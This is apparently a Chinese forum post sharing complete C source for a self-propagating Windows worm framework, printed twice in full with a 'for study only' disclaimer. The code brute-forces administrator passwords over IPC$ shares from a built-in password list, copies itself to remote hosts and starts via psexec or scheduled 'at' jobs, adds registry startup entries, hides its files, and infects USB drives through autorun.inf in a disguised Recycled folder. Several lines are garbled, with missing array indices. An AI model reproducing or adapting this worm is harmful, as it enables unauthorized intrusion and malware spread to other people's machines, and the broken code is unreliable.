本程序由前期贴出的病毒改造而来,修正了前期病毒的BUG,提取其精华部分,实现了一个通过网络和U盘传播的蠕虫病毒框架。
作者注:版权没有,随意修改。本框架仅供学习娱乐之用,勿做其他非法用途,否则责任自负!
//frame.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include <io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{ //配置全局变量类型
char syspath[18]; //系统路径
char hostip[16]; //主机IP
char guestip[16]; //客户IP
char user[14]; //用户名
char passwd[14]; //密码
char flag[6]; //标识
char lastdisk[4]; //最后一个盘符
unsigned send :1; //是否攻击网络,0不攻击,1攻击
unsigned station :5; //客户本机标识/10的值,保留功能
unsigned hacknum :10; //已入侵的主机数
};
void getpath(); //获取系统路径
void getconfig(); //获取配置信息
void openconfig(char *flagfile); //读取配置并解密
void saveconfig(char *flagfile); //加密保存配置
void filecopy(FILE *fp,char *path); //拷贝副本
void checkTime(char *hostip); //和主机对时
void changereg(); //更改注册表
unsigned char Init(); //初始化
void hacknet(char *netid,unsigned char childip);//网络入侵
void hackdisk(char *diskroot); //攻击U盘
void TIMER(long minute); //主循环模拟事件
//init.cpp,系统初始化
#include <windows.h>
#include "frame.h"
extern struct sys Sysmesg; //定义于config.cpp
extern char *__args[6]; //定义于config.cpp
void saveconfig(char *flagfile) //加密保存配置
{
struct sys message=Sysmesg;
char *p=(char *)&message;
for(unsigned char i=0;i<sizeof(message);i++)
(*p++)+=17;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void openconfig(char *flagfile) //读取配置并解密
{
FILE *fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(unsigned char i=0;i<sizeof(Sysmesg);i++)
(*p++)-=17;
}
void getconfig() //从参数获取配置信息
{
char disk[4]="C://";
FILE *fp;
strcpy(Sysmesg.hostip,__args[1]);
if(strcmp(Sysmesg.hostip,"127.0.0.1"))
strcpy(Sysmesg.guestip,__args[2]);
else
{
char cmd[65];
WinExec("cmd.exe /c ipconfig.exe|find /"IP Address/">ipaddress",SW_HIDE);
Sleep(2000);
fp=fopen("ipaddress","rb");
fgets(cmd,100,fp);
fclose(fp);
WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
for(unsigned char i=strlen(cmd);cmd <'0' || cmd>'9';i--);
for(cmd=0;cmd!=' ';i--);
strcpy(Sysmesg.guestip,&cmd); //获取本地IP地址
}
strcpy(Sysmesg.user,__args[3]);
strcpy(Sysmesg.passwd,__args[4]);
strcpy(Sysmesg.flag,__args[5]);
if(Sysmesg.flag[1]=='Z')
Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
Sysmesg.flag[1]+=1;
if(Sysmesg.flag[0]=='Z' && Sysmesg.flag[1]=='Z' || !strcmp(Sysmesg.guestip,""))
Sysmesg.send=0;
else
Sysmesg.send=1;
Sysmesg.station=0; //获取本机标识/10的值
unsigned char i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip-'0';
while(access(disk,0)==0)
disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk); //获取最后一个盘符
Sysmesg.hacknum=0; //初始化已攻击机器数
if(strcmp(Sysmesg.hostip,"127.0.0.1")) //网络入侵则和主机对时
checkTime(Sysmesg.hostip);
}
void getpath() //获取系统路径
{
if(access("C://WINDOWS//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINDOWS//Tasks//");
else if(access("C://WINNT//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//Tasks//");
else if(access("C://WINNT",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//");
else
strcpy(Sysmesg.syspath,"C://");
}
void filecopy(FILE *fp,char *path) //拷贝副本
{
fprintf(fp,"attrib -r -h -s %s/r/n",__args[0]);
fprintf(fp,"copy %s %s%s/r/n",__args[0],path,__args[0]);
fprintf(fp,"attrib +r +h +s %s/r/n",__args[0]);
fprintf(fp,"attrib +r +h +s %s%s/r/n",path,__args[0]);
if(access("psexec.exe",0)==0)
{
fprintf(fp,"attrib -r -h -s psexec.exe/r/n");
fprintf(fp,"copy psexec.exe %s/r/n",path);
fprintf(fp,"attrib +r +h +s psexec.exe/r/n");
fprintf(fp,"attrib +r +h +s %spsexec.exe/r/n",path);
}
}
void checkTime(char hostip[16]) //和主机对时
{
FILE *fp=fopen("checktime.bat","wb");
fprintf(fp,"net use %s//ipc$ /"/" /user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time %s /set /y/r/n",Sysmesg.hostip);
fprintf(fp,"net use %s//ipc$ /del /y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);
}
void changereg() //更改注册表
{
FILE *fp=fopen("regchg.bat","wb");
fprintf(fp,"echo Windows Registry Editor Version 5.00>change.reg/r/n");
fprintf(fp,"echo.>>change.reg/r/n");
fprintf(fp,"echo [HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows]>>change.reg/r/n");
if(!strcmp(Sysmesg.syspath,"C://WINDOWS//Tasks//"))
fprintf(fp,"echo /"load/"=/"C:WINDOWSTasks%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//Tasks//"))
fprintf(fp,"echo /"load/"=/"C:WINNTTasks%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//"))
fprintf(fp,"echo /"load/"=/"C:WINNT%s/">>change.reg/r/n",__args[0]);
else
fprintf(fp,"echo /"load/"=/"C:%s/">>change.reg/r/n",__args[0]);
fprintf(fp,"regedit /s change.reg/r/n");
fprintf(fp,"del change.reg/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
unsigned char Init() //初始化
{
char flagfile[32];
getpath(); //获取系统路径
sprintf(flagfile,"%s%s",Sysmesg.syspath,__args[0]);
if(access(flagfile,0)==-1) //通过U盘传播进入或用户自己激发
{
FILE *fp=fopen("localhak.bat","wb");
filecopy(fp,Sysmesg.syspath);
fprintf(fp,"start /D %s %s%s 127.0.0.1 ",Sysmesg.syspath,Sysmesg.syspath,__args[0]);
fprintf(fp,"/"/" administrator /"/" AA001/r/n");
if(__argc==2)
fprintf(fp,"explorer %s/r/n",__args[1]); //打开U盘
fprintf(fp,"del localhak.bat/r/n"); fclose(fp);
WinExec("localhak.bat",SW_HIDE);
return 0;
}
if(__argc==2) //双击U盘时机器已感染
{
char cmd[20]="explorer ";
strcat(cmd,__args[1]);
WinExec(cmd,SW_SHOW);
return 0;
}
sprintf(flagfile,"%sconfig",Sysmesg.syspath);
if(__argc==6) //通过网络入侵进入系统
{
getconfig();
saveconfig(flagfile);
changereg();
}
else
{
openconfig(flagfile);
sprintf(flagfile,"d://Recycled//%s",__args[0]);
if(access("d://",0)==0 && access(flagfile,0)==-1)
hackdisk("d://"); //感染D盘,防止重装系统
}
return 1;
}
//frame.cpp,主文件
#include <time.h>
#include <direct.h>
#include <windows.h>
#include "frame.h"
struct sys Sysmesg; //配置全局变量
char *__args[6];
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
unsigned char k=0,i;
long minute=0;
for(i=strlen(_pgmptr)-1;_pgmptr!='//';i--);
__args[0]=&_pgmptr; //获取可执行文件名
_pgmptr=0;
_chdir(_pgmptr); //更改当前目录到可执行文件目录
if(__argc>1) //分离命令行参数
for(i=1,__args[1]=lpCmdLine;lpCmdLine[k]!=0;k++)
if(lpCmdLine[k]==' ')
{
lpCmdLine[k]=0;
while(lpCmdLine[++k]==' ');
if(lpCmdLine[k]!=0)
__args[++i]=&lpCmdLine[k];
}
if(!Init()||(CreateMutex(NULL,TRUE,"_BACKUPRUN_")&&GetLastError()==ERROR_ALREADY_EXISTS))
return 0; //初始化失败或者程序已在运行就退出
while(1)
{
Sleep(5000);
TIMER(++minute);
}
return 0;
}
void hacknet(char netid[12],unsigned char childip) //网络入侵
{
char farid[4]="123",flag[6],flagfile[36];
char *passwd[]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
"888888","12345678","000000","god","God","haha","user","admin","passwd",
"password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
"0125","0912","0705","0735","911","520","father","mother","brother","sister",
"beauty","beautiful","strong","power","powerful","rand","intel","dell",
"sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
"chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
"jay","allen","john","beijing","nanjing","hefei","jodan","backhan","LEGEND",
"LENOVO","Jodan","microsoft","Microsoft","bill","kiss","kitty","wang","zhang",
"liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
"copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
int exist=access("psexec.exe",0);
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use %s%s//ipc$ /"/" /user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use %s%s//ipc$ /del /y/r/n",netid,farid);
if(exist==0)
fprintf(fp,"set user=%s/r/nset passwd=%s/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net use %s%s//ipc$ ",netid,farid);
fprintf(fp,"%s /user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
if(exist==0)
{
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
fprintf(fp,"set user=administrator/r/n");
for(int i=0;i<100;i++)
{
fprintf(fp,"set passwd=%s/r/n",passwd);
fprintf(fp,"net use %s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
}
}
else
for(int i=0;i<100;i++)
fprintf(fp,"if errorlevel 1 net use %s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto end/r/n");
if(exist==0)
fprintf(fp,":ready/r/n");
sprintf(flagfile,"%s%s//admin$//Tasks//",netid,farid);
fprintf(fp,"if not exist %s goto disconnect/r/n",flagfile);
fprintf(fp,"if exist %s%s goto disconnect/r/n",flagfile,__args[0]);
filecopy(fp,flagfile);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0]; flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0'; flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0'; flag[5]=0;
if(exist==0) //如果工具存在,则利用工具启动
fprintf(fp,"psexec.exe %s%s -u %%user%% -p %%passwd%% -d ",netid,farid);
else //利用计划任务启动
{
time_t xx=time(0)+600;
char tm[25];
strcpy(tm,ctime(&xx));
tm[19]=0;
fprintf(fp,"at %s%s %s ",netid,farid,&tm[11]);
}
fprintf(fp,"%s%s %s %s%s ",Sysmesg.syspath,__args[0],Sysmesg.guestip,netid,farid);
if(exist==0)
fprintf(fp,"%%user%% %%passwd%% %s/r/n",flag);
else if(strcmp(Sysmesg.passwd,"/"/""))
fprintf(fp,"%s %s %s/r/n",Sysmesg.user,Sysmesg.passwd,flag);
else
fprintf(fp,"%s ///"///" %s/r/n",Sysmesg.user,flag);
fprintf(fp,"echo %s%s>>child/r/n",netid,farid);
fprintf(fp,":disconnect/r/n"); fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n"); fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
sprintf(flagfile,"%s%s",Sysmesg.syspath,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4]) //感染U盘
{
char copypath[13];
sprintf(copypath,"%sRecycled//",diskroot);
FILE *fp=fopen("diskhack.bat","wb");
fprintf(fp,"if exist %sRecycled goto complete/r/n",diskroot);
fprintf(fp,"md %sRecycled/r/n",diskroot);
fprintf(fp,"echo [.ShellClassInfo]>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled/r/n",diskroot);
fprintf(fp,":complete/r/n");
fprintf(fp,"if not exist %sautorun.inf goto ready/r/n",diskroot);
fprintf(fp,"attrib -s -r -h %sautorun.inf/r/n",diskroot);
fprintf(fp,"del %sautorun.inf/r/n",diskroot);
fprintf(fp,":ready/r/n");
fprintf(fp,"echo [autorun]>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo open=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo shell//1=打开(^&O)>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo shell//1//Command=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo shellexecute=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
filecopy(fp,copypath);
fprintf(fp,"attrib +s +r +h %sautorun.inf/r/n",diskroot);
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void TIMER(long minute) //主循环模拟触发器
{
char disk[4],backfile[25];
strcpy(disk,Sysmesg.lastdisk);
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
if(access(disk,0)==0) //感染U盘
{
sprintf(backfile,"%sRecycled//%s",disk,__args[0]);
if(access(backfile,0)==-1) //识别U盘是否已感染
{
hackdisk(disk);
Sleep(2000);
}
}
if(minute%59==0 && Sysmesg.send && Sysmesg.hacknum<999) //尝试网络入侵
{
char netid[16];
unsigned char childip;
strcpy(netid,Sysmesg.guestip);
if(Sysmesg.station==0)
netid[strlen(netid)-1]=0;
else if(Sysmesg.station<10)
netid[strlen(netid)-2]=0;
else
netid[strlen(netid)-3]=0;
srand((unsigned)time(NULL)); //初始化种子
childip=rand()%254+1;
hacknet(netid,childip);
}
//可以在这里添加进入系统后所要完成的任务
}
作者注:版权没有,随意修改。本框架仅供学习娱乐之用,勿做其他非法用途,否则责任自负!
//frame.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include <io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{ //配置全局变量类型
char syspath[18]; //系统路径
char hostip[16]; //主机IP
char guestip[16]; //客户IP
char user[14]; //用户名
char passwd[14]; //密码
char flag[6]; //标识
char lastdisk[4]; //最后一个盘符
unsigned send :1; //是否攻击网络,0不攻击,1攻击
unsigned station :5; //客户本机标识/10的值,保留功能
unsigned hacknum :10; //已入侵的主机数
};
void getpath(); //获取系统路径
void getconfig(); //获取配置信息
void openconfig(char *flagfile); //读取配置并解密
void saveconfig(char *flagfile); //加密保存配置
void filecopy(FILE *fp,char *path); //拷贝副本
void checkTime(char *hostip); //和主机对时
void changereg(); //更改注册表
unsigned char Init(); //初始化
void hacknet(char *netid,unsigned char childip);//网络入侵
void hackdisk(char *diskroot); //攻击U盘
void TIMER(long minute); //主循环模拟事件
//init.cpp,系统初始化
#include <windows.h>
#include "frame.h"
extern struct sys Sysmesg; //定义于config.cpp
extern char *__args[6]; //定义于config.cpp
void saveconfig(char *flagfile) //加密保存配置
{
struct sys message=Sysmesg;
char *p=(char *)&message;
for(unsigned char i=0;i<sizeof(message);i++)
(*p++)+=17;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void openconfig(char *flagfile) //读取配置并解密
{
FILE *fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(unsigned char i=0;i<sizeof(Sysmesg);i++)
(*p++)-=17;
}
void getconfig() //从参数获取配置信息
{
char disk[4]="C://";
FILE *fp;
strcpy(Sysmesg.hostip,__args[1]);
if(strcmp(Sysmesg.hostip,"127.0.0.1"))
strcpy(Sysmesg.guestip,__args[2]);
else
{
char cmd[65];
WinExec("cmd.exe /c ipconfig.exe|find /"IP Address/">ipaddress",SW_HIDE);
Sleep(2000);
fp=fopen("ipaddress","rb");
fgets(cmd,100,fp);
fclose(fp);
WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
for(unsigned char i=strlen(cmd);cmd <'0' || cmd>'9';i--);
for(cmd=0;cmd!=' ';i--);
strcpy(Sysmesg.guestip,&cmd); //获取本地IP地址
}
strcpy(Sysmesg.user,__args[3]);
strcpy(Sysmesg.passwd,__args[4]);
strcpy(Sysmesg.flag,__args[5]);
if(Sysmesg.flag[1]=='Z')
Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
Sysmesg.flag[1]+=1;
if(Sysmesg.flag[0]=='Z' && Sysmesg.flag[1]=='Z' || !strcmp(Sysmesg.guestip,""))
Sysmesg.send=0;
else
Sysmesg.send=1;
Sysmesg.station=0; //获取本机标识/10的值
unsigned char i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip-'0';
while(access(disk,0)==0)
disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk); //获取最后一个盘符
Sysmesg.hacknum=0; //初始化已攻击机器数
if(strcmp(Sysmesg.hostip,"127.0.0.1")) //网络入侵则和主机对时
checkTime(Sysmesg.hostip);
}
void getpath() //获取系统路径
{
if(access("C://WINDOWS//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINDOWS//Tasks//");
else if(access("C://WINNT//Tasks",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//Tasks//");
else if(access("C://WINNT",0)==0)
strcpy(Sysmesg.syspath,"C://WINNT//");
else
strcpy(Sysmesg.syspath,"C://");
}
void filecopy(FILE *fp,char *path) //拷贝副本
{
fprintf(fp,"attrib -r -h -s %s/r/n",__args[0]);
fprintf(fp,"copy %s %s%s/r/n",__args[0],path,__args[0]);
fprintf(fp,"attrib +r +h +s %s/r/n",__args[0]);
fprintf(fp,"attrib +r +h +s %s%s/r/n",path,__args[0]);
if(access("psexec.exe",0)==0)
{
fprintf(fp,"attrib -r -h -s psexec.exe/r/n");
fprintf(fp,"copy psexec.exe %s/r/n",path);
fprintf(fp,"attrib +r +h +s psexec.exe/r/n");
fprintf(fp,"attrib +r +h +s %spsexec.exe/r/n",path);
}
}
void checkTime(char hostip[16]) //和主机对时
{
FILE *fp=fopen("checktime.bat","wb");
fprintf(fp,"net use %s//ipc$ /"/" /user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time %s /set /y/r/n",Sysmesg.hostip);
fprintf(fp,"net use %s//ipc$ /del /y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);
}
void changereg() //更改注册表
{
FILE *fp=fopen("regchg.bat","wb");
fprintf(fp,"echo Windows Registry Editor Version 5.00>change.reg/r/n");
fprintf(fp,"echo.>>change.reg/r/n");
fprintf(fp,"echo [HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows]>>change.reg/r/n");
if(!strcmp(Sysmesg.syspath,"C://WINDOWS//Tasks//"))
fprintf(fp,"echo /"load/"=/"C:WINDOWSTasks%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//Tasks//"))
fprintf(fp,"echo /"load/"=/"C:WINNTTasks%s/">>change.reg/r/n",__args[0]);
else if(!strcmp(Sysmesg.syspath,"C://WINNT//"))
fprintf(fp,"echo /"load/"=/"C:WINNT%s/">>change.reg/r/n",__args[0]);
else
fprintf(fp,"echo /"load/"=/"C:%s/">>change.reg/r/n",__args[0]);
fprintf(fp,"regedit /s change.reg/r/n");
fprintf(fp,"del change.reg/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
unsigned char Init() //初始化
{
char flagfile[32];
getpath(); //获取系统路径
sprintf(flagfile,"%s%s",Sysmesg.syspath,__args[0]);
if(access(flagfile,0)==-1) //通过U盘传播进入或用户自己激发
{
FILE *fp=fopen("localhak.bat","wb");
filecopy(fp,Sysmesg.syspath);
fprintf(fp,"start /D %s %s%s 127.0.0.1 ",Sysmesg.syspath,Sysmesg.syspath,__args[0]);
fprintf(fp,"/"/" administrator /"/" AA001/r/n");
if(__argc==2)
fprintf(fp,"explorer %s/r/n",__args[1]); //打开U盘
fprintf(fp,"del localhak.bat/r/n"); fclose(fp);
WinExec("localhak.bat",SW_HIDE);
return 0;
}
if(__argc==2) //双击U盘时机器已感染
{
char cmd[20]="explorer ";
strcat(cmd,__args[1]);
WinExec(cmd,SW_SHOW);
return 0;
}
sprintf(flagfile,"%sconfig",Sysmesg.syspath);
if(__argc==6) //通过网络入侵进入系统
{
getconfig();
saveconfig(flagfile);
changereg();
}
else
{
openconfig(flagfile);
sprintf(flagfile,"d://Recycled//%s",__args[0]);
if(access("d://",0)==0 && access(flagfile,0)==-1)
hackdisk("d://"); //感染D盘,防止重装系统
}
return 1;
}
//frame.cpp,主文件
#include <time.h>
#include <direct.h>
#include <windows.h>
#include "frame.h"
struct sys Sysmesg; //配置全局变量
char *__args[6];
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
unsigned char k=0,i;
long minute=0;
for(i=strlen(_pgmptr)-1;_pgmptr!='//';i--);
__args[0]=&_pgmptr; //获取可执行文件名
_pgmptr=0;
_chdir(_pgmptr); //更改当前目录到可执行文件目录
if(__argc>1) //分离命令行参数
for(i=1,__args[1]=lpCmdLine;lpCmdLine[k]!=0;k++)
if(lpCmdLine[k]==' ')
{
lpCmdLine[k]=0;
while(lpCmdLine[++k]==' ');
if(lpCmdLine[k]!=0)
__args[++i]=&lpCmdLine[k];
}
if(!Init()||(CreateMutex(NULL,TRUE,"_BACKUPRUN_")&&GetLastError()==ERROR_ALREADY_EXISTS))
return 0; //初始化失败或者程序已在运行就退出
while(1)
{
Sleep(5000);
TIMER(++minute);
}
return 0;
}
void hacknet(char netid[12],unsigned char childip) //网络入侵
{
char farid[4]="123",flag[6],flagfile[36];
char *passwd[]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
"888888","12345678","000000","god","God","haha","user","admin","passwd",
"password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
"0125","0912","0705","0735","911","520","father","mother","brother","sister",
"beauty","beautiful","strong","power","powerful","rand","intel","dell",
"sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
"chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
"jay","allen","john","beijing","nanjing","hefei","jodan","backhan","LEGEND",
"LENOVO","Jodan","microsoft","Microsoft","bill","kiss","kitty","wang","zhang",
"liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
"copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
int exist=access("psexec.exe",0);
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use %s%s//ipc$ /"/" /user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use %s%s//ipc$ /del /y/r/n",netid,farid);
if(exist==0)
fprintf(fp,"set user=%s/r/nset passwd=%s/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net use %s%s//ipc$ ",netid,farid);
fprintf(fp,"%s /user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
if(exist==0)
{
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
fprintf(fp,"set user=administrator/r/n");
for(int i=0;i<100;i++)
{
fprintf(fp,"set passwd=%s/r/n",passwd);
fprintf(fp,"net use %s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if %%errorlevel%%==0 goto ready/r/n");
}
}
else
for(int i=0;i<100;i++)
fprintf(fp,"if errorlevel 1 net use %s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto end/r/n");
if(exist==0)
fprintf(fp,":ready/r/n");
sprintf(flagfile,"%s%s//admin$//Tasks//",netid,farid);
fprintf(fp,"if not exist %s goto disconnect/r/n",flagfile);
fprintf(fp,"if exist %s%s goto disconnect/r/n",flagfile,__args[0]);
filecopy(fp,flagfile);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0]; flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0'; flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0'; flag[5]=0;
if(exist==0) //如果工具存在,则利用工具启动
fprintf(fp,"psexec.exe %s%s -u %%user%% -p %%passwd%% -d ",netid,farid);
else //利用计划任务启动
{
time_t xx=time(0)+600;
char tm[25];
strcpy(tm,ctime(&xx));
tm[19]=0;
fprintf(fp,"at %s%s %s ",netid,farid,&tm[11]);
}
fprintf(fp,"%s%s %s %s%s ",Sysmesg.syspath,__args[0],Sysmesg.guestip,netid,farid);
if(exist==0)
fprintf(fp,"%%user%% %%passwd%% %s/r/n",flag);
else if(strcmp(Sysmesg.passwd,"/"/""))
fprintf(fp,"%s %s %s/r/n",Sysmesg.user,Sysmesg.passwd,flag);
else
fprintf(fp,"%s ///"///" %s/r/n",Sysmesg.user,flag);
fprintf(fp,"echo %s%s>>child/r/n",netid,farid);
fprintf(fp,":disconnect/r/n"); fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n"); fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
sprintf(flagfile,"%s%s",Sysmesg.syspath,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4]) //感染U盘
{
char copypath[13];
sprintf(copypath,"%sRecycled//",diskroot);
FILE *fp=fopen("diskhack.bat","wb");
fprintf(fp,"if exist %sRecycled goto complete/r/n",diskroot);
fprintf(fp,"md %sRecycled/r/n",diskroot);
fprintf(fp,"echo [.ShellClassInfo]>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled/r/n",diskroot);
fprintf(fp,":complete/r/n");
fprintf(fp,"if not exist %sautorun.inf goto ready/r/n",diskroot);
fprintf(fp,"attrib -s -r -h %sautorun.inf/r/n",diskroot);
fprintf(fp,"del %sautorun.inf/r/n",diskroot);
fprintf(fp,":ready/r/n");
fprintf(fp,"echo [autorun]>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo open=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo shell//1=打开(^&O)>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo shell//1//Command=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo shellexecute=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
filecopy(fp,copypath);
fprintf(fp,"attrib +s +r +h %sautorun.inf/r/n",diskroot);
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void TIMER(long minute) //主循环模拟触发器
{
char disk[4],backfile[25];
strcpy(disk,Sysmesg.lastdisk);
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
if(access(disk,0)==0) //感染U盘
{
sprintf(backfile,"%sRecycled//%s",disk,__args[0]);
if(access(backfile,0)==-1) //识别U盘是否已感染
{
hackdisk(disk);
Sleep(2000);
}
}
if(minute%59==0 && Sysmesg.send && Sysmesg.hacknum<999) //尝试网络入侵
{
char netid[16];
unsigned char childip;
strcpy(netid,Sysmesg.guestip);
if(Sysmesg.station==0)
netid[strlen(netid)-1]=0;
else if(Sysmesg.station<10)
netid[strlen(netid)-2]=0;
else
netid[strlen(netid)-3]=0;
srand((unsigned)time(NULL)); //初始化种子
childip=rand()%254+1;
hacknet(netid,childip);
}
//可以在这里添加进入系统后所要完成的任务
}
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
